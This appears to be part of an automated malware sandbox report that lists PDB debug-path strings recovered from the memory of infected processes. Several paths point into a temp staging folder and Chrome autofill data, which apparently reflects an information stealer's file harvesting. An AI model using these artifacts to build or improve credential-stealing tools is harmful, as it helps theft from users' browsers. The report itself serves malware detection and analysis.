Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2ming.lock= source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\L.usernlmp.pdb source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb.LOG1` source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdb\ source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2uy source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb2 source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb} source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2Y source: AppLaunch.exe, 00000009.00000002.2019886967.0000000007CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lmp.pdb source: AppLaunch.exe, 00000009.00000002.2019886967.0000000007CB0000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2031135122.000000000867F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831he source: AppLaunch.exe, 00000009.00000002.2027653774.000000000842C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2029399466.000000000857D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\AC\ source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdb source: jtfCFDmLdX.exe, jtfCFDmLdX.exe, 00000000.00000000.1648365598.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, TE0FN83.exe, TE0FN83.exe, 00000001.00000000.1650796309.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Tg9kb35.exe, Tg9kb35.exe, 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831.1\ source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2aming.lock0 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831e\. source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2026868148.0000000008377000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2023917736.0000000008160000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbcrobat source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\sicl4o\Eternal.pdb source: Tg9kb35.exe, 00000002.00000003.1655167777.00000000048FC000.00000004.00000020.00020000.00000000.sdmp, 4ZZ099qJ.exe, 00000006.00000000.1659874995.000000000101A000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbU source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: offDef.pdb source: 6rR8iy1.exe, 0000000C.00000003.1757109513.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1877778092.000000000217C000.00000004.00000020.00020000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1883266505.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1878139256.0000000002420000.00000004.08000000.00040000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1882966196.0000000003555000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\x76cyldboe\Eternal.pdb source: 2zx1310.exe, 00000003.00000000.1655916149.00000000009EA000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2044956338.0000024C2EF9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb.e source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\winload_prod.pdbe\* source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data.pdb\* source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Google\Chrome\User Data\AutofillStateses.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831he=95 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Silk.pdb source: explorer.exe, 0000000B.00000003.1967274019.0000000009C80000.00000004.00000001.00020000.00000000.sdmp, 8427.exe, 00000012.00000000.1962650891.0000000000802000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: nlmp.pdb source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000009.00000002.2018813681.00000000079B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb5 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb. source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831wy source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58318 source: AppLaunch.exe, 00000009.00000002.2024876554.0000000008182000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb7V source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbc source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\ntkrnlmp.pdbml source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: 6rR8iy1.exe, 0000000C.00000003.1757109513.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1877778092.000000000217C000.00000004.00000020.00020000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1878139256.0000000002420000.00000004.08000000.00040000.00000000.sdmp, 6rR8iy1.exe, 0000000C.00000002.1882966196.0000000003555000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831* source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdbdD source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb_) source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ate source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2031135122.000000000867F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb(: source: AppLaunch.exe, 00000009.00000002.2023917736.0000000008160000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbE source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdbAC source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb.bwe\ source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb. source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
